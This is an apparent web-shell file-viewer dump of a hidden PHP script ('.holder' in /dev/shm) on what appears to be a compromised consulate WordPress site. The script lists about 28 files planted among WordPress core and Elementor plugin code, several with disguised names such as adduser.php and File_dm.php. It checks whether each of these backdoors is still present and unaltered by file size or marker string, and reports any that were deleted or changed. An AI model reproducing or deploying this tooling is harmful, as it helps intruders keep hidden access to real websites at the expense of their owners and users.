Current File : //proc/thread-self/root/dev/shm/.holder
<?php   $r = '/home/vanuatuconsulate/WEBSITES/www.vanuatu-consulate.com/public'; $x = ["/wp-blog-header.php"=>"bd@@152843298@@41",
"/wp-content/plugins/all-in-one-wp-migration/lib/view/main/backups-path-notice.php"=>"bd@@152824176@@event_dispatcher",
"/wp-includes/blocks/list.php"=>"bd@@152824189@@core_engine",
"/wp-content/plugins/all-in-one-wp-migration/lib/vendor/bandar/bandar/lib/Exceptions/6.7.php"=>"bd@@152824191@@607",
"/wp-content/plugins/elementor-pro/vendor_prefixed/php-di/php-di/src/Compiler/campaign.php"=>"bd@@152824193@@2553",
"/wp-content/plugins/elementor-pro/vendor_prefixed/php-di/php-di/src/Annotation/DBG.php"=>"bd@@152824194@@654",
"/wp-content/plugins/elementor-pro/modules/notes/database/transformers/user.transformer.php"=>"bd@@152824195@@1510",
"/wp-content/plugins/elementor/app/modules/import-export-customization/data/gb_post.php"=>"bd@@152824198@@1625",
"/cloud.php"=>"bd@@152794065@@602",
"/File_dm.php"=>"bd@@152794066@@805",
"/param.php"=>"bd@@152794068@@796",
"/wp-includes/rest-api/endpoints/class-wp-rest-block-pattern-categories-controller.php"=>"bd@@152830422@@buffer_cache",
"/wp-includes/SimplePie/library/SimplePie/Content/Type/Sniffer.php"=>"bd@@152830432@@task_processor",
"/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/php-di/php-di/src/Proxy/visitingStaff.php"=>"bd@@152830433@@1514",
"/wp-content/plugins/elementor-pro/vendor_prefixed/php-di/invoker/src/Reflection/adduser.php"=>"bd@@152830434@@569",
"/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/psr/container/src/enrol_ldap.php"=>"bd@@152830436@@620",
"/wp-content/plugins/elementor-pro/modules/forms/submissions/database/sh404sef.inc.php"=>"bd@@152830438@@632",
"/wp-includes/class-wp-tax-query.php"=>"bd@@152843312@@71",
"/wp-admin/network/plugin-editor.php"=>"bd@@152843313@@76",
"/wp-content/plugins/elementor/assets/js/packages/editor-styles-repository/editor-styles-repository.asset.php"=>"bd@@152843314@@21",
"/wp-includes/blocks/query/view.min.asset.php"=>"bd@@152843315@@system_core",
"/wp-includes/customize/class-wp-customize-themes-section.php"=>"bd@@152843317@@83",
"/wp-content/plugins/elementor/vendor_prefixed/dependency-injection/php-di/phpdoc-reader/src/PhpDocReader/config_clicks.php"=>"bd@@152843319@@613",
"/wp-content/plugins/elementor-pro/vendor_prefixed/php-di/php-di/src/Factory/teachingStaff.php"=>"bd@@152843320@@622",
"/wp-content/plugins/elementor/app/modules/import-export-customization/processes/ot_total.php"=>"bd@@152843323@@1620",
"/wp-content/plugins/elementor-pro/modules/loop-builder/files/css/loop.dynamic.css.php"=>"bd@@152843322@@1488",
"/wp-content/plugins/elementor/app/modules/import-export/runners/revert/site.content.php"=>"bd@@152830435@@1549",
"/wp-content/plugins/elementor-pro/modules/notes/data/endpoints/read.endpoint.php"=>"bd@@152843321@@2003"]; foreach ($x as $p => $l) {     $f = "{$r}{$p}";     list($t, $id, $pt) = explode('@@', $l);     if (!file_exists($f)) {         print "<$t>{$id}##d</$t>\n";         continue;     }     if (is_numeric($pt)) {         $fs = filesize($f);         if ($fs != $pt) {             print "<$t>{$id}##bs</$t>\n";         }     } else {         $c = file_get_contents($f);         if (!strstr($c, $pt)) {             print "<$t>{$id}##d</$t>\n";         }     } } die('!end!');